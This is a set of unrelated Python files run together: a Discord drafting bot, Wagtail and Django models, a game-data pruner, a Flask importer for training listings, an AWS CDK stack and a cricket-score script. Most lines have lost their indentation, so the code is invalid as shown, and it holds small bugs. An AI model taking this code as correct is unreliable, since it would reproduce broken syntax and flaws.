emb.add_field(name="Drafts", value=plyr.draft_amount)
emb.add_field(name="Last Seasons Drafts", value=plyr.old_draft_amount)
await self.bot.say(embed=emb)
print("## showed profile of "+player.display_name)
else:
await self.bot.say("Playername is either wrong or the player is not registered", delete_after=autodeletetime)
@commands.command(pass_context=True)
async def draftme(self, ctx):
"""gives yourself the 'Drafter' role used to notify you of drafts happening"""
if ctx.message.server == None:
await self.bot.say("You can only use this command on a server")
return
drafter = discord.utils.get(ctx.message.server.roles, name="MM participant")
if drafter in ctx.message.author.roles:
await self.bot.say(ctx.message.author.mention +", you already have this role", delete_after=autodeletetime)
else:
await self.bot.add_roles(ctx.message.author, drafter)
await self.bot.say('Given the role "Drafter" to '+ ctx.message.author.mention, delete_after=autodeletetime)
print("## Gave role 'Drafter' to "+ ctx.message.author.display_name)
@commands.command(pass_context=True)
async def undraftme(self, ctx):
"""removes the role 'Drafter' from you"""
if ctx.message.server == None:
await self.bot.say("You can only use this command on a server")
return
drafter = discord.utils.get(ctx.message.server.roles, name="MM participant")
if drafter in ctx.message.author.roles:
await self.bot.remove_roles(ctx.message.author, drafter)
await self.bot.say('Removed the role "Drafter" from '+ ctx.message.author.mention, delete_after=autodeletetime)
print("## Removed the role 'Drafter' from "+ ctx.message.author.display_name)
else:
await self.bot.say(ctx.message.author.mention +", you dont have this role", delete_after=autodeletetime)
@commands.command(pass_context=True)
async def template(self, ctx):
"""a google docs template for entering the records of your draft
create yourself a copy of this and you should be good to go
"""
await self.bot.say("https://docs.google.com/spreadsheets/d/1GKg2YtHehQrDEKqJ1obSECk0Drh_D1Scznh8Feuw1IE/edit?usp=sharing")
print("## Sent link to template")
@commands.command(pass_context=True)
async def showdraft(self, ctx, draftid=""):
"""Shows the informations of a draft"""
if Path("drafts/"+draftid+".p").is_file():
with open("drafts/"+draftid+".p", "rb") as f:
draftobj = pickle.load(f)
emb = discord.Embed(title="Draft information", description="Draft ID: "+draftid, color=0x3498db)
emb.set_thumbnail(url=ctx.message.server.icon_url)
emb.add_field(name="Name", value=draftobj.name)
emb.add_field(name="Size", value=str(draftobj.size))
emb.add_field(name="Date", value=draftobj.date)
host = ctx.message.server.get_member(draftobj.host)
if host != None:
emb.add_field(name="Host", value=host.mention)
else:
emb.add_field(name="Host", value="Unknown")
if draftobj.draftpage != "":
emb.add_field(name="Draftpage", value=draftobj.draftpage)
emb.add_field(name="Status", value=draftobj.status)
eligibleRole = discord.utils.get(ctx.message.server.roles, id=draftobj.eligible)
if eligibleRole != None:
emb.add_field(name="Eligible", value=eligibleRole.name)
else:
emb.add_field(name="Eligible", value="Unknown")
if draftobj.results == None:
emb.add_field(name="Results", value="Nothing entered yet")
else:
results = "*__Player__ __W/L__*\n"
for key in draftobj.results:
name = key
if name.startswith("_"):
name = name[1:]
results = results + name +"\n "+ str(draftobj.results[key][0]) +"/"+ str(draftobj.results[key][1])+"\n"
emb.add_field(name="Results", value=results, inline=False)
await self.bot.say(embed=emb)
if draftobj.decks != None:
deckEmb = discord.Embed(title="Decks", description="Decks of '"+draftobj.name+"'", color=0x3498db)
for d in draftobj.decks:
deckEmb.add_field(name=d["name"], value=d["value"], inline=False)
await self.bot.say(embed=deckEmb)
print("## showed draftinfos of "+ draftid)
else:
await self.bot.say("That draft does not exists", delete_after=autodeletetime)
@commands.command(pass_context=True)
async def draftlist(self, ctx):
"""shows a list of the most recent drafts"""
if not Path("data/drafting/draftlist.p").is_file():
with open("data/drafting/draftlist.p", "wb") as f:
l = [["listbeginning", "nothing to see here", "nope nothin"]]
pickle.dump(l, f)
with open("data/drafting/draftlist.p", "rb") as f:
l = pickle.load(f)
emb = discord.Embed(title="Draft list", description="The 10 most recent drafts", color=0x3498db)
emb.set_thumbnail(url=ctx.message.server.icon_url)
emb.set_footer(text="Use !showdraft <id> for more information on a single draft")
if len(l) >= 10:
r = 10
else:
r = len(l)
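        # Walk the list backwards, skipping the placeholder entry at index 0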
for n in range(r, 1, -1):
emb.add_field(name=str(r-n+1)+"- "+l[n-1][0]+" | "+l[n-1][2], value="ID: "+l[n-1][1], inline=False)
await self.bot.say(embed=emb)
print("## showed draftlist")
@commands.command(pass_context=True)
async def draftleaderboard(self, ctx):
"""shows the top of all drafters"""
if not Path("data/drafting/leaderboard.p").is_file():
with open("data/drafting/leaderboard.p", "wb") as f:
l = [["listbeginning", 0]]
pickle.dump(l, f)
with open("data/drafting/leaderboard.p", "rb") as f:
l = pickle.load(f)
emb = discord.Embed(title="Leaderboard", description="The top drafters", color=0x3498db)
emb.set_thumbnail(url=ctx.message.server.icon_url)
if len(l) >= 11:
r = 11
else:
r = len(l)
for n in range(r-1):
emb.add_field(name=str(n+1)+"- "+l[n][0], value=" "+str(l[n][1])+" trophies", inline=False)
await self.bot.say(embed=emb)
print("## showed leaderboard")
async def drafting(self, player1, player2, noleg):
p1deckhalf1 = "-"
p1deckhalf2 = "-"
p2deckhalf1 = "-"
p2deckhalf2 = "-"
cardemb1 = discord.Embed(title="Card 1", color=discord.Colour.red())
cardemb2 = discord.Embed(title="Card 2", color=discord.Colour.blue())
p1card1 = await self.bot.send_message(player1, embed=cardemb1)
p1card2 = await self.bot.send_message(player1, embed=cardemb2)
p2card1 = await self.bot.send_message(player2, embed=cardemb1)
p2card2 = await self.bot.send_message(player2, embed=cardemb2)
pemb1 = discord.Embed(title="Minidraft vs "+player2.display_name, description="Wait for your turn", color=discord.Colour.green())
pemb1.set_thumbnail(url=player2.avatar_url)
pemb1.add_field(name="Round", value="1/4", inline=False)
pemb1.add_field(name="Your deck", value=p1deckhalf1, inline=False)
pemb1.add_field(name="Opponents deck", value=p2deckhalf2, inline=False)
pemb1.add_field(name="Card 1", value="-")
pemb1.add_field(name="Card 2", value="-")
msg1 = await self.bot.send_message(player1, embed=pemb1)
pemb2 = discord.Embed(title="Minidraft vs "+player1.display_name, description="Wait for your turn", color=discord.Colour.green())
pemb2.set_thumbnail(url=player1.avatar_url)
pemb2.add_field(name="Round", value="1/4", inline=False)
pemb2.add_field(name="Your deck", value=p2deckhalf1, inline=False)
pemb2.add_field(name="Opponents deck", value=p1deckhalf2, inline=False)
pemb2.add_field(name="Card 1", value="-")
pemb2.add_field(name="Card 2", value="-")
msg2 = await self.bot.send_message(player2, embed=pemb2)
def check(reaction, user):
if user != self.bot.user:
if reaction.emoji == "🔴" or reaction.emoji == "🔵":
return True
return False
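        # Build a pool of 16 unique cards; when noleg is set, legendary cards are skipped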
cardpool = []
while len(cardpool) < 16:
i = randint(0,len(self.cards)-1)
if not self.cards[i] in cardpool:
if noleg == True:
if self.cards[i]["rarity"] == "Legendary":
continue
cardpool.append(self.cards[i])
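        # Split the 16 cards into two pools of four pairs, one pool per player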
pool1 = []
for i in range(0, 7, 2):
pair = []
pair.append(cardpool[i])
pair.append(cardpool[i+1])
pool1.append(pair)
pool2 = []
for i in range(8, 15, 2):
pair = []
pair.append(cardpool[i])
pair.append(cardpool[i+1])
pool2.append(pair)
p1deckhalf1 = ""
p1deckhalf2 = ""
p2deckhalf1 = ""
p2deckhalf2 = ""
for r in range(4):
#player 1
pemb2.description = "Opponents turn"
pemb2.set_field_at(0, name="Round", value=str(r+1)+"/4", inline=False)
await self.bot.edit_message(msg2, embed=pemb2)
cardemb1.set_image(url="http://www.clashapi.xyz/images/cards/"+pool1[r][0]['idName']+".png")
cardemb2.set_image(url="http://www.clashapi.xyz/images/cards/"+pool1[r][1]['idName']+".png")
pemb1.description = "Pick a Card (10 seconds time)"
pemb1.set_field_at(0, name="Round", value=str(r+1)+"/4", inline=False)
pemb1.set_field_at(3, name="Card 1", value=pool1[r][0]['name'])
pemb1.set_field_at(4, name="Card 2", value=pool1[r][1]['name'])
await self.bot.edit_message(p1card1, embed=cardemb1)
await self.bot.edit_message(p1card2, embed=cardemb2)
await self.bot.edit_message(msg1, embed=pemb1)
await self.bot.add_reaction(msg1, "🔴") # red
await self.bot.add_reaction(msg1, "🔵") # blue
react = await self.bot.wait_for_reaction(message=msg1, timeout=10, check=check)
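            # No reaction within the timeout: pick one of the two cards at random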
if react == None:
c = randint(1,2)
if c == 1:
p1deckhalf1 = p1deckhalf1 + pool1[r][0]['name'] + ", "
p2deckhalf2 = p2deckhalf2 + pool1[r][1]['name'] + ", "
else:
p1deckhalf1 = p1deckhalf1 + pool1[r][1]['name'] + ", "
p2deckhalf2 = p2deckhalf2 + pool1[r][0]['name'] + ", "
elif react.reaction.emoji == "🔴": # red
p1deckhalf1 = p1deckhalf1 + pool1[r][0]['name'] + ", "
p2deckhalf2 = p2deckhalf2 + pool1[r][1]['name'] + ", "
elif react.reaction.emoji == "🔵": # blue
p1deckhalf1 = p1deckhalf1 + pool1[r][1]['name'] + ", "
p2deckhalf2 = p2deckhalf2 + pool1[r][0]['name'] + ", "
pemb1.description = "Opponents turn"
pemb1.set_field_at(1, name="Your deck", value=p1deckhalf1, inline=False)
pemb1.set_field_at(2, name="Opponents deck", value=p2deckhalf2, inline=False)
pemb1.set_field_at(3, name="Card 1", value="-")
pemb1.set_field_at(4, name="Card 2", value="-")
await self.bot.delete_message(msg1)
msg1 = await self.bot.send_message(player1, embed=pemb1)
cardemb1.set_image(url="")
cardemb2.set_image(url="")
await self.bot.edit_message(p1card1, embed=cardemb1)
await self.bot.edit_message(p1card2, embed=cardemb2)
#player 2
cardemb1.set_image(url="http://www.clashapi.xyz/images/cards/"+pool2[r][0]['idName']+".png")
cardemb2.set_image(url="http://www.clashapi.xyz/images/cards/"+pool2[r][1]['idName']+".png")
pemb2.description = "Pick a Card (10 seconds time)"
pemb2.set_field_at(3, name="Card 1", value=pool2[r][0]['name'])
pemb2.set_field_at(4, name="Card 2", value=pool2[r][1]['name'])
await self.bot.edit_message(p2card1, embed=cardemb1)
await self.bot.edit_message(p2card2, embed=cardemb2)
await self.bot.edit_message(msg2, embed=pemb2)
await self.bot.add_reaction(msg2, "🔴") # red
await self.bot.add_reaction(msg2, "🔵") # blue
react = await self.bot.wait_for_reaction(message=msg2, timeout=10, check=check)
if react == None:
c = randint(1,2)
if c == 1:
                    p2deckhalf1 = p2deckhalf1 + pool2[r][0]['name'] + ", "
                    p1deckhalf2 = p1deckhalf2 + pool2[r][1]['name'] + ", "
else:
p2deckhalf1 = p2deckhalf1 + pool2[r][1]['name'] + ", "
p1deckhalf2 = p1deckhalf2 + pool2[r][0]['name'] + ", "
elif react.reaction.emoji == "🔴": # red
p2deckhalf1 = p2deckhalf1 + pool2[r][0]['name'] + ", "
p1deckhalf2 = p1deckhalf2 + pool2[r][1]['name'] + ", "
elif react.reaction.emoji == "🔵": # blue
p2deckhalf1 = p2deckhalf1 + pool2[r][1]['name'] + ", "
p1deckhalf2 = p1deckhalf2 + pool2[r][0]['name'] + ", "
pemb2.set_field_at(1, name="Your deck", value=p2deckhalf1, inline=False)
pemb2.set_field_at(2, name="Opponents deck", value=p1deckhalf2, inline=False)
pemb2.set_field_at(3, name="Card 1", value="-")
pemb2.set_field_at(4, name="Card 2", value="-")
await self.bot.delete_message(msg2)
msg2 = await self.bot.send_message(player2, embed=pemb2)
cardemb1.set_image(url="")
cardemb2.set_image(url="")
await self.bot.edit_message(p2card1, embed=cardemb1)
await self.bot.edit_message(p2card2, embed=cardemb2)
pemb1.description = "Minidraft finished"
pemb2.description = "Minidraft finished"
await self.bot.edit_message(msg1, embed=pemb1)
await self.bot.edit_message(msg2, embed=pemb2)
await self.bot.send_message(player1, "Your final deck:\n"+"```"+p1deckhalf1+p1deckhalf2+"```")
await self.bot.send_message(player2, "Your final deck:\n"+"```"+p2deckhalf1+p2deckhalf2+"```")
@commands.group(pass_context=True)
async def minidraft(self, ctx, opponent:discord.Member):
"""creates a casual 1v1 minidraft
Minidrafts work the same way the ingame draftchallenge works.
        You need to @mention the user you want to challenge. They will have 15 minutes to accept the challenge before it times out.
The draft will be held over DMs with the bot
"""
challenger = ctx.message.author
if opponent == challenger:
await self.bot.say("You cant challenge yourself", delete_after=autodeletetime)
return
l = ""
if ctx.invoked_subcommand is None:
noleg = False
else:
noleg = True
l = "\nNo legendaries will be able to be drafted"
await self.bot.say(challenger.mention+" challenged "+opponent.mention+" for a minidraft"+l)
print("## "+challenger.display_name+" challenged "+opponent.display_name+" for a minidraft"+l)
chMsg = await self.bot.send_message(opponent, "You were challenged for a minidraft by "+challenger.display_name+". "+l+"\nDo you want to accept the challenge?")
await self.bot.add_reaction(chMsg, "❎")#no
await self.bot.add_reaction(chMsg, "✅")#yes
def check_isBot(reaction, user):
if user == self.bot.user:
return False
else:
return True
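        # Wait up to 15 minutes for the opponent to accept (✅) or decline (❎) the challenge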
while True:
react = await self.bot.wait_for_reaction(message=chMsg, timeout=900, check=check_isBot)
if react == None:
await self.bot.remove_reaction(chMsg, "❎", self.bot.user)
await self.bot.remove_reaction(chMsg, "✅", self.bot.user)
await self.bot.edit_message(chMsg, new_content=chMsg.content+"\n*The challenge timed out*")
await self.bot.send_message(challenger, "Your challenge for "+opponent.display_name+" timed out")
print("## "+challenger.display_name+"'s challenge for "+opponent.display_name+" timed out")
return
if react.reaction.emoji == "❎": #no
await self.bot.remove_reaction(chMsg, "❎", self.bot.user)
await self.bot.remove_reaction(chMsg, "✅", self.bot.user)
await self.bot.edit_message(chMsg, new_content=chMsg.content+"\n*Challenge declined*")
await self.bot.send_message(challenger, opponent.display_name+" declined your challenge")
print("## "+challenger.display_name+"'s challenge for "+opponent.display_name+" got declined")
return
if react.reaction.emoji == "✅": # yes
await self.bot.remove_reaction(chMsg, "❎", self.bot.user)
await self.bot.remove_reaction(chMsg, "✅", self.bot.user)
await self.bot.edit_message(chMsg, new_content=chMsg.content+"\n*Challenge accepted*")
await self.bot.send_message(challenger, opponent.display_name+" accepted your challenge")
print("## "+challenger.display_name+"'s challenge for "+opponent.display_name+" got accepted")
break
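        # Ready check: both players have 3 minutes to confirm before the draft starts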
for i in range(2):
if i == 0:
participant = challenger
else:
participant = opponent
rdyCheck = await self.bot.send_message(participant, "Are you ready to start?")
await self.bot.add_reaction(rdyCheck, "❎")#no
await self.bot.add_reaction(rdyCheck, "✅")#yes
rdy = await self.bot.wait_for_reaction(message=rdyCheck, timeout=180, check=check_isBot)
if rdy == None:
await self.bot.remove_reaction(rdyCheck, "❎", self.bot.user)
await self.bot.remove_reaction(rdyCheck, "✅", self.bot.user)
await self.bot.edit_message(rdyCheck, new_content=rdyCheck.content+"\n*Readycheck timed out*")
                await self.bot.send_message(challenger, participant.display_name+"'s readycheck timed out")
                await self.bot.send_message(opponent, participant.display_name+"'s readycheck timed out")
print("## "+participant.display_name+"'s readycheck timed out")
return
if rdy.reaction.emoji == "✅": #yes
await self.bot.remove_reaction(rdyCheck, "❎", self.bot.user)
await self.bot.remove_reaction(rdyCheck, "✅", self.bot.user)
await self.bot.edit_message(rdyCheck, new_content=rdyCheck.content+"\n*Readycheck cleared*")
await self.bot.send_message(challenger, participant.display_name+" cleared readycheck")
await self.bot.send_message(opponent, participant.display_name+" cleared readycheck")
print("## "+participant.display_name+" cleared readycheck")
else:
await self.bot.remove_reaction(rdyCheck, "❎", self.bot.user)
await self.bot.remove_reaction(rdyCheck, "✅", self.bot.user)
await self.bot.edit_message(rdyCheck, new_content=rdyCheck.content+"\n*Readycheck declined*")
                await self.bot.send_message(challenger, participant.display_name+" declined the readycheck")
                await self.bot.send_message(opponent, participant.display_name+" declined the readycheck")
print("## "+participant.display_name+"'s readycheck got declined")
return
await self.drafting(challenger, opponent, noleg)
def setup(bot):
bot.add_cog(Drafting(bot))
|
from wagtail.core import blocks
from wagtail.core.blocks import RichTextBlock
from wagtail.core.fields import StreamField
from wagtail.admin.edit_handlers import TabbedInterface, StreamFieldPanel, ObjectList
from falmer.content import components
from falmer.content.blocks import HeroImageBlock, FalmerImageChooserBlock
from falmer.content.models.core import Page
class GridItem(blocks.StructBlock):
title = blocks.CharBlock(required=True)
link = blocks.URLBlock()
image = FalmerImageChooserBlock()
description = RichTextBlock(required=False)
class Meta:
icon = 'item'
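# A page type whose body mixes a hero image block, a text component, and a selection grid of GridItem entries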
class SelectionGridPage(Page):
body = StreamField([
('heading_hero', HeroImageBlock()),
components.text.to_pair(),
('selection_grid', blocks.ListBlock(GridItem)),
])
content_panels = Page.content_panels + [
StreamFieldPanel('body'),
]
edit_handler = TabbedInterface([
ObjectList(content_panels, heading='Content'),
ObjectList(Page.promote_panels, heading='Promote'),
ObjectList(Page.settings_panels, heading='Settings', classname="settings"),
])
type_fields = (
'body',
)
|
import json
CHAR_LOC = "character_table.json"
ITEM_LOC = "item_table.json"
FORMULA_LOC = "building_data.json"
FTYPE='formulaType'
FCT = 'manufactFormulas'
CHIP = "F_ASC"
FCT_REMOVE = ('weight', 'costPoint', 'formulaType', 'buffType', 'requireRooms', 'requireStages')
WRK = 'workshopFormulas'
ELITE = "F_EVOLVE"
WRK_REMOVE = ('apCost', 'formulaType', 'buffType', 'extraOutcomeRate', 'extraOutcomeGroup', 'requireRooms', 'requireStages')
ITM = 'items'
ITM_REMOVE = ('description', 'iconId', 'overrideBkg', 'stackIconId', 'sortId', 'usage', 'obtainApproach',
'classifyType', 'itemType', 'stageDropList')
FMLINK = 'buildingProductList'
#ITM_VALS = list(range(3211, 3283)) + list(range(30011, 32001))
RARE = 'rarity'
CHAR_REMOVE = ('description', 'canUseGeneralPotentialItem', 'potentialItemId', 'team', 'displayNumber',
'tokenKey', 'appellation', 'position', 'tagList', 'displayLogo', 'itemUsage', 'itemDesc',
'itemObtainApproach', 'maxPotentialLevel', 'profession', 'trait', 'talents', 'potentialRanks',
'favorKeyFrames')
RM = "roomType"
CONVRM = {"MANUFACTURE":"manufactFormulas", "WORKSHOP":"workshopFormulas"}
FMID = "formulaId"
NM = 'name'
COST = 'costs'
def pruneFormulas():
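    """Load building_data.json and keep only the factory dual-chip (F_ASC) and workshop F_EVOLVE formulas, with unused fields stripped."""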
try:
with open(FORMULA_LOC, "r") as fmfile:
fmdata = (json.loads(fmfile.read()))
except Exception:
        raise IOError("Failed to read file.")
[fmdata.pop(datadesc) for datadesc in list(fmdata.keys()) if datadesc not in [FCT, WRK]]
toRmv = []
for fnum in fmdata[FCT].keys():
if fmdata[FCT][fnum][FTYPE] == CHIP: # Keep formulas related to dualchip production (only in factories)
[fmdata[FCT][fnum].pop(datarow) for datarow in FCT_REMOVE]
else:
toRmv.append(fnum)
[fmdata[FCT].pop(fct_fnum) for fct_fnum in toRmv]
toRmv = []
for fnum in fmdata[WRK].keys():
if fmdata[WRK][fnum][FTYPE] == ELITE:
[fmdata[WRK][fnum].pop(datarow) for datarow in WRK_REMOVE]
else:
toRmv.append(fnum)
[fmdata[WRK].pop(wrk_fnum) for wrk_fnum in toRmv]
return fmdata
def pruneItems():
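    """Load item_table.json, keep only items whose numeric IDs fall in the handled ranges, and strip unused fields."""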
try:
with open(ITEM_LOC, "r") as itemfile:
itemdata = (json.loads(itemfile.read()))
except Exception:
        raise IOError("Failed to read file.")
[itemdata.pop(datadesc) for datadesc in list(itemdata.keys()) if datadesc != ITM]
toRmv = []
for fnum in itemdata[ITM].keys():
if fnum.isdigit() and \
((int(fnum) >= 3211 and int(fnum) <= 3303) or (int(fnum) >= 30011 and int(fnum) <= 32001)):
[itemdata[ITM][fnum].pop(datarow) for datarow in ITM_REMOVE]
if (int(fnum) >= 3211 and int(fnum) <= 3303 and (int(fnum) % 10 != 3 or int(fnum) == 3303)):
itemdata[ITM][fnum][FMLINK] = []
else:
toRmv.append(fnum)
[itemdata[ITM].pop(itm_fnum) for itm_fnum in toRmv]
return itemdata[ITM]
def pruneChars():
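    """Load character_table.json, drop characters below rarity index 3 and token entries, and strip unused fields."""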
try:
with open(CHAR_LOC, "r") as charfile:
chardata = (json.loads(charfile.read()))
except Exception:
        raise IOError("Failed to read file.")
[chardata.pop(char) for char in list(chardata.keys()) if chardata[char][RARE] < 3 or char.startswith("token_")]
for charnum in chardata.keys():
[chardata[charnum].pop(datarow) for datarow in CHAR_REMOVE]
return chardata
def itemmapper(itemdata, formulas):
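    """Replace each item's buildingProductList with the cost list of its first linked formula and build a name -> id lookup dict."""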
namedict = {}
for inum in itemdata.keys():
if len(itemdata[inum][FMLINK]) == 0:
itemdata[inum][COST] = []
itemdata[inum].pop(FMLINK)
else:
itemdata[inum][COST] = formulas[CONVRM[itemdata[inum][FMLINK][0][RM]]][itemdata[inum][FMLINK][0][FMID]][COST]
itemdata[inum].pop(FMLINK)
namedict[itemdata[inum][NM]] = inum
return itemdata, namedict
def main(write = False):
itemdata, namedict = itemmapper(pruneItems(), pruneFormulas())
if write:
with open('chardata.json', 'w', encoding='utf-8') as charw:
json.dump(pruneChars(), charw, ensure_ascii=False, indent=4)
with open('formulas.json', 'w', encoding='utf-8') as fmw:
json.dump(itemdata, fmw, ensure_ascii=False, indent=4)
with open('itemnames.json', 'w', encoding='utf-8') as inamew:
json.dump(namedict, inamew, ensure_ascii=False, indent=4)
with open('itemids.json', 'w', encoding='utf-8') as iidw:
json.dump({itemid:itemname for itemname, itemid in namedict.items()}, iidw, ensure_ascii=False, indent=4)
else:
return [pruneChars(), itemdata, namedict]
if __name__ == '__main__':
main(True)
|
# Generated by Django 3.2 on 2021-05-17 19:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('django_api', '0012_auto_20210517_0801'),
]
operations = [
migrations.AddField(
model_name='user',
name='pays',
field=models.CharField(default='None', max_length=100),
),
]
|
import copy
import json
from urllib3 import ProxyManager
from urllib import request
from flask import Response
from sqlalchemy import func
from config.config import HTTP_PROXY
from decorator.log_task import log_task
class UpdateLifelongLearningServices:
def __init__(self, db):
self.db = db
@log_task
def run(self): # pylint: disable=too-many-locals
base_url = "https://api.formator.lu/search/cybersecuritytrainings/en"
if HTTP_PROXY is not None:
http = ProxyManager(HTTP_PROXY)
response = http.request('GET', base_url)
content = response.data
else:
response = request.urlopen(base_url) # nosec
content = response.read()
data = json.loads(content)
count = {
"reviewed": 0,
"created": 0,
"modified": 0,
"deactivated": 0
}
        # Get the INFPC entity
        entity = self.db.session.query(self.db.tables["Company"]) \
            .filter(func.lower(self.db.tables["Company"].name).like("%infpc%")) \
            .all()
if len(entity) == 0:
return [], "500 INFPC entity not found"
if len(entity) > 1:
return [], "500 Too many INFPC entity found"
entity = entity[0]
# Get the 'Training' taxonomy value
training_tags = self.db.session.query(self.db.tables["TaxonomyValue"]) \
.filter(func.lower(self.db.tables["TaxonomyValue"].name).like("Training")) \
.filter(func.lower(self.db.tables["TaxonomyValue"].category).like("SERVICE CATEGORY")) \
.all()
if len(training_tags) == 0:
return [], "500 'TRAINING' value in the 'SERVICE CATEGORY' taxonomy not found"
training_tag = training_tags[0]
# Treat the data
external_references = [a["id"] for a in data["trainings"]]
db_services = self.db.get(
self.db.tables["Article"],
{"external_reference": external_references}
)
for source_service in data["trainings"]:
db_article = [a for a in db_services if str(source_service["id"]) == a.external_reference]
db_article = db_article[0] if len(db_article) > 0 else self.db.tables["Article"]()
count["reviewed"] += 1
count["created"] += 1 if db_article.id is None else 0
db_article, m1 = self._manage_service(db_article, source_service, entity, training_tag)
count["modified"] += 1 if (db_article.id is not None and m1) else 0
# Deactivate the missing services
self._deactivate_deprecated_services(entity, external_references)
# Send response
status = f"200 Success: {count['reviewed']} treated, {count['created']} created, " \
f"{count['modified']} modified, {count['deactivated']} deactivated"
return Response(status=status)
def _manage_service(self, a, source, entity, training_tag):
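        """Create or update an Article from a source training, link it to the entity and the Training tag, and return (article, is_modified)."""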
copied_a = copy.deepcopy(a)
handle = f"{source['id']}"
# Insert data into Article object
a.external_reference = source["id"] if a.external_reference is None else a.external_reference
a.title = source['title'] if a.title is None else a.title
        a.description = UpdateLifelongLearningServices._get_description(source) if a.description is None else a.description
a.handle = handle if a.handle is None else a.handle
a.type = "SERVICE" if a.type is None else a.type
a.status = "PUBLIC" if a.status is None else a.status
a.link = source["link"] if a.link is None else a.link
a.is_created_by_admin = True
# Save modifications in DB
article = self.db.merge(a, self.db.tables["Article"])
is_modified = not self.db.are_objects_equal(a, copied_a, self.db.tables["Article"])
        # Add the INFPC company relationship if it does not exist
tags = self.db.get(self.db.tables["ArticleCompanyTag"], {"company": entity.id, "article": article.id})
if len(tags) == 0:
self.db.insert({"company": entity.id, "article": article.id}, self.db.tables["ArticleCompanyTag"])
# Add the Training tag if it does not exist
tags = self.db.get(
self.db.tables["ArticleTaxonomyTag"],
{"taxonomy_value": training_tag.id, "article": article.id}
)
if len(tags) == 0:
self.db.insert(
{"taxonomy_value": training_tag.id, "article": article.id},
self.db.tables["ArticleTaxonomyTag"]
)
return article, is_modified
def _deactivate_deprecated_services(self, entity, external_references):
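        """Archive the entity's public articles whose external_reference no longer appears in the source feed."""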
subquery = self.db.session.query(self.db.tables["ArticleCompanyTag"]) \
.with_entities(self.db.tables["ArticleCompanyTag"].article) \
.filter(self.db.tables["ArticleCompanyTag"].company == entity.id) \
.subquery()
offers_to_archive = self.db.session.query(self.db.tables["Article"]) \
.filter(self.db.tables["Article"].status == "PUBLIC") \
.filter(self.db.tables["Article"].id.in_(subquery)) \
.filter(self.db.tables["Article"].external_reference.notin_(external_references)) \
.all()
if len(offers_to_archive) > 0:
for o in offers_to_archive:
o.status = "ARCHIVE"
self.db.merge(offers_to_archive, self.db.tables["Article"])
@staticmethod
def _get_description(source):
description = ""
if source["company"] is not None and len(source["company"]) > 0:
description += f"Company: {source['company']} \u2014 "
if source["durationInHours"] is not None and len(str(source["durationInHours"])) > 0:
description += f"Duration in hours: {str(source['durationInHours'])} \u2014 "
if source["trainingLevelTitle"] is not None and len(source["trainingLevelTitle"]) > 0:
description += f"Level: {source['company']} \u2014 "
if len(description) > 0:
description = description[:-3]
return description
|
from aws_cdk import core
import aws_cdk.aws_apigateway as apigw
import aws_cdk.aws_certificatemanager as cm
import aws_cdk.aws_route53 as route53
import aws_cdk.aws_route53_targets as route53_targets
from .constructs import Api
from . import Environment
class Production(core.Stack):
def __init__(self, scope: core.Construct, construct_id: str, **kwargs) -> None:
super().__init__(scope, construct_id, **kwargs)
core.Tags.of(self).add("Project", "JuliusKrahnBlogBackend")
core.Tags.of(self).add("Environment", "Production")
api = Api(self, f"{construct_id}Api", environment=Environment.PRODUCTION)
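        # Expose the API on api.juliuskrahn.com via a regional custom domain backed by an ACM certificate and a Route53 alias record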
api_domain_name = apigw.DomainName(
self,
"ApiDomainName",
domain_name="api.juliuskrahn.com",
certificate=cm.Certificate.from_certificate_arn(
self,
"blog-api-domain-name-certificate",
"arn:aws:acm:eu-central-1:473883619336:certificate/4e5cacb4-f88b-45c3-abea-ce543b125499"
),
endpoint_type=apigw.EndpointType.REGIONAL
)
api_domain_name.add_base_path_mapping(api.instance)
route53.ARecord(
self,
"ApiARecord",
record_name="api",
target=route53.RecordTarget.from_alias(route53_targets.ApiGatewayDomain(api_domain_name)),
zone=route53.HostedZone.from_lookup(self, "blog-hosted-zone", domain_name="juliuskrahn.com")
)
|
from flask import session
from flask_login import UserMixin
class User(UserMixin):
"""User model
Saves user data in Flask session
"""
def __init__(self, user_id, token, email=None, name=None):
self.id = user_id
self.token = token
self.email = email
self.name = name
user_entry = {
'id': self.id,
'token': self.token,
'email': self.email,
'name': self.name,
}
# Create session user db if not already exists
user_db = session.get('user_db')
if not user_db:
session['user_db'] = {}
# Add user to db if user ID does not yet exist
if self.id not in session['user_db']:
session['user_db'].update({self.id: user_entry})
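            # Note: updating the nested dict in place may not mark the Flask session as
            # modified; if changes are not persisted, setting session.modified = True is a
            # common safeguard.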
def is_authenticated(self):
if 'user_db' not in session:
return False
# User authenticated if their ID exists in the user_db dict
        return self.id in session['user_db']
# Get user object if exists, None otherwise
@classmethod
def get(cls, user_id):
if 'user_db' in session:
if user_id in session['user_db']:
user = session['user_db'].get(user_id)
return User(user['id'], user['token'], user['email'], user['name'])
# Clear current user entry from user db
@classmethod
def clear(cls, user_id):
if 'user_db' in session:
if user_id in session['user_db']:
session['user_db'].pop(user_id)
|
import json
from time import sleep
import requests
def match():
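    """Fetch the list of ongoing matches and return a dict of serial number -> [unique_id, description]."""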
d = {}
count = 1
template1 = "http://cricapi.com/api/cricket"
data = requests.get(template1)
js = data.json()
if js['cache']:
for i in js['data']:
d[count] = [i["unique_id"],i['description']]
count += 1
return d
def details(y):
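    """Print the teams, score and innings requirement for the match with the given unique_id."""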
template2 = "http://cricapi.com/api/cricketScore?unique_id="
url = template2 + str(y)
data = requests.get(url)
js = data.json()
print()
if js['cache']:
print(js['team-1'],"Vs",js['team-2'])
print(js['score'])
print(js['innings-requirement'])
print()
x = match()
print("No.of Ongoing Matches:",len(x))
sleep(2)
print()
for k,i in enumerate(x,start=1):
print(k,".",x[i][1])
sleep(0.5)
print()
while True:
try:
select = input("Enter the S.No corresponding the match: ")
if select.strip() == 'q':
break
details(x[int(select)][0])
except:
print("Invalid input!")
|